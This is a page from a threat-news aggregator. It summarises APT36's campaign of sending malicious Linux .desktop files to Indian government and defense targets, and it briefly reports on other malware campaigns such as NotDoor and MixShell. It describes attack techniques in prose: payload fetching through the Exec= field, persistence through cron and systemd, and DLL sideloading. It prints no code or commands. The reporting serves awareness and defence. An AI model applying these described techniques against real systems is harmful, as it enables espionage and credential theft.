CyberHappenings logo
☰
🏠 Home 📂 Browse ℹī¸ About

APT36 Linux .desktop File Abuse for Malware Delivery in Ongoing Espionage Campaign

First reported
Last updated
📰 2 unique sources, 2 articles

Summary

Hide ▲

APT36, a Pakistani cyber espionage group, is actively exploiting Linux .desktop files to deliver malware in attacks targeting government and defense entities in India. The campaign, which began on August 1, 2025, uses phishing emails to distribute ZIP archives containing malicious .desktop files disguised as PDFs. These files execute a payload that establishes persistent access and exfiltrates data. The attack leverages the 'Exec=' field in .desktop files to run shell commands, fetching and executing a hex-encoded payload from attacker-controlled servers or Google Drive. The payload is a Go-based ELF executable designed for espionage, capable of maintaining stealth and setting up persistence through cron jobs and systemd services. Communication with the command and control (C2) server is conducted over a bi-directional WebSocket channel. APT36 has also been observed targeting Windows and BOSS Linux systems, using spoofed domains and infrastructure hosted on Pakistan-based servers to steal credentials and 2FA codes.

Timeline

  1. 25.08.2025 11:13 📰 1 articles

    APT36 Expands Campaign to Include Windows and BOSS Linux Systems

    On August 25, 2025, new details emerged about the ongoing APT36 campaign. The group, also known as Transparent Tribe, has expanded its targeting to include both Windows and BOSS Linux systems. The campaign uses phishing emails with meeting notices to deliver malicious .desktop files, which execute a Go-based binary that communicates with a hard-coded C2 server. The malware establishes persistence through a cron job and includes anti-debugging and anti-sandbox checks to evade detection. Additionally, the campaign deploys a known Transparent Tribe backdoor called Poseidon. APT36 has also been observed targeting Indian defense organizations and government entities using spoofed domains and infrastructure hosted on Pakistan-based servers to steal credentials and 2FA codes. The group's tactics include using typo-squatted domains and targeting the Kavach 2FA solution used by Indian government agencies.

    Show sources
    Open in new tab
  2. 22.08.2025 21:35 📰 2 articles

    APT36 Launches Ongoing Linux .desktop File Abuse Campaign

    On August 1, 2025, APT36 initiated a new malware campaign targeting government and defense entities in India. The campaign uses phishing emails to deliver ZIP archives containing malicious .desktop files disguised as PDFs. These files exploit the 'Exec=' field to execute shell commands that fetch and run a hex-encoded payload from attacker-controlled servers or Google Drive. The payload is a Go-based ELF executable designed for espionage, with capabilities for stealth and persistence. Communication with the C2 server is conducted over a bi-directional WebSocket channel. The campaign is ongoing and demonstrates APT36's evolving tactics, becoming more evasive and sophisticated.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

ChillyHell macOS Backdoor Resurfaces with New Capabilities

The ChillyHell macOS backdoor malware, initially observed in 2022, has resurfaced with a new version. This modular backdoor allows attackers remote access and the ability to drop payloads, brute-force passwords, and evade detection. The malware, disguised as an executable applet, was discovered on VirusTotal and had been publicly hosted on Dropbox since 2021. The malware employs multiple persistence mechanisms and communicates over various protocols, making it highly flexible. It can exfiltrate data, drop additional payloads, and enumerate user accounts. Apple has revoked the notarization of the developer certificates associated with the malware. The resurgence of ChillyHell highlights the increasing threat landscape for macOS, emphasizing the need for robust security measures. A new Go-based remote access trojan (RAT) named ZynorRAT has been discovered, targeting Windows and Linux systems. ZynorRAT uses a Telegram bot for command and control and supports a wide range of functions, including file exfiltration and system enumeration.

Open in new tab

APT28 deploys NotDoor backdoor via Microsoft Outlook

APT28, a Russian state-sponsored threat group, has been using a new backdoor malware called NotDoor to target Microsoft Outlook. The malware exploits Outlook as a covert communication, data exfiltration, and malware delivery channel. NotDoor is a VBA macro that monitors incoming emails for specific trigger words. When triggered, it allows attackers to exfiltrate data, upload files, and execute commands on the victim's computer. The malware is delivered via a legitimate signed binary, Microsoft's OneDrive.exe, vulnerable to DLL sideloading. The backdoor was identified by researchers from Lab52, the threat intelligence arm of Spanish cybersecurity firm S2 Grupo. The malware has been deployed against companies in NATO member countries, using advanced techniques to evade detection and maintain persistence. NotDoor supports multiple commands for data exfiltration and file uploads, and uses Base64-encoded PowerShell commands for various operations. The malware creates a staging folder in the %TEMP% directory to store and exfiltrate files, encoding them with custom encryption before sending via email. APT28's attacks involve the abuse of Microsoft Dev Tunnels for C2 infrastructure, providing stealth and rapid infrastructure rotation. The attack chain includes the use of bogus Cloudflare Workers domains to distribute additional payloads, demonstrating a high level of specialized design and obfuscation.

Open in new tab

MixShell Malware Targets U.S. Supply Chain Manufacturers via Contact Forms

A sophisticated social engineering campaign dubbed ZipLine targets U.S. supply chain manufacturers with MixShell in-memory malware. Attackers initiate contact through companies' public 'Contact Us' forms, building trust over weeks before delivering malicious ZIP files. The campaign spans multiple sectors and countries, including Singapore, Japan, and Switzerland. The malware uses in-memory execution, DNS-based command-and-control (C2), and advanced evasion techniques. It exploits legitimate services like Heroku to blend with normal network activity, posing severe risks including intellectual property theft and supply chain disruptions. The threat actors use abandoned or dormant domains with legitimate business histories to bypass security filters and gain trust. The fake company websites used by attackers are cloned from a single template, featuring stock images of White House butlers as supposed founders. The malicious ZIP file contains real PDF and DOCX files related to the discussion topic, hosted on a Heroku subdomain.

Open in new tab

Global Phishing Campaign Installs RATs via Malicious Scripts

A rapidly spreading phishing campaign targets Windows users worldwide, stealing credentials and deploying remote access trojans (RATs) via malicious scripts. The campaign is particularly impacting organizations in manufacturing, technology, healthcare, construction, and retail/hospitality sectors. The attack begins with socially engineered emails leading to personalized phishing pages, which deliver JavaScript files acting as droppers for UpCrypter malware. This malware deploys various RATs, including PureHVNC, DCRat, and Babylon RAT, providing long-term access to the compromised networks. The campaign has shown rapid growth, with detection counts doubling in just two weeks. The attack chain involves obfuscated scripts, personalized phishing pages, and sophisticated evasion techniques to avoid detection. The use of ready-made tools and phishing kits from underground sites contributes to the campaign's complexity and spread. Additionally, attackers are exploiting legitimate services like Google Classroom, Microsoft 365, and OneNote for phishing campaigns, and using client-side evasion techniques to bypass defenses. Defenders are advised to implement multi-layered defenses, including strong email filters, employee training, and up-to-date security tools.

Open in new tab

New Android spyware targeting Russian business executives

A new Android malware named Android.Backdoor.916.origin is targeting executives of Russian businesses. The spyware masquerades as antivirus software from the Russian Federal Security Services (FSB) and the Central Bank of the Russian Federation. It has been in development since January 2025, with multiple versions released. The malware can snoop on conversations, stream from the phone's camera, log user input, and exfiltrate communication data from messenger apps. It requests extensive permissions and connects to a command and control (C2) server to execute various malicious commands. The malware has been observed using multiple branding attempts, including 'GuardCB' and 'SECURITY_FSB.' It mimics genuine security tools to prevent removal and simulates fake detections during scans. The malware is designed for resilience, capable of switching between up to 15 hosting providers.

Open in new tab